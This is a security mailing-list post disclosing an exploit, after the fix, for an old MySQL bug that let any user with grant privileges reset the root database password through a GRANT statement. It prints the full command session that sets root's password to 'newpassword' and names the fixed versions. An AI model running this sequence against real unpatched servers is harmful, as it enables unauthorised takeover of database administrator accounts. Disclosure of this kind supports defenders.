Re: Serious bug in MySQL password handling.

[viktor () DTEK CHALMERS SE (Viktor Fougstedt)]

Hi.

As I posted to bugtraq a few weeks ago, I discovered a serious bug in
MySQL:s password handling, affecting versions 3.22.29 and earlier, and
3.23.8 and earlier.

As promised in that post, I now post an exploit, since all serious
admins should have upgraded by now, especially with the
password-checking bug found recently by Robert van der Meulen.

Note that the bug which the code in this post exploits is fixed in
3.22.30 and later, as well as 3.23.10 and later. No current MySQL
is vulnerable to this exploit.

The old problem was simply that any user could alter any password in
the system using the GRANT statement.

Exploit: Connect to mysql as any user with grant privileges for any
table. The default test users will do nicely. If no databases has been
created for the test user, do so. Then alter roots (MySQL's roots, not
the real roots!) password with a GRANT. After the code below has been
executed, the password of the MySQL superuser 'root' will be
'newpassword'.

> mysql -utest -p
Password:

mysql> CREATE DATABASE test_expl;
Query OK, 1 row affected (0.04 sec)

mysql> GRANT select ON test_expl.* TO root@localhost IDENTIFIED BY 'newpassword';
Query OK, 0 rows affected (0.01 sec)

mysql> exit
Bye

The problem was quickly fixed, and I got good response from the people
at TCX Datakonsult AB (thanks Monty!). I warmly recommend MySQL to
anyone.

This message is not CC:ed to the mysql-list, as an exploit has already
been posted there.

/Viktor...

--|     Viktor Fougstedt, system administrator at dtek.chalmers.se     |--
--|                http://www.dtek.chalmers.se/~viktor/                |--
--| ...soon we'll be sliding down the razor blade of life. /Tom Lehrer |--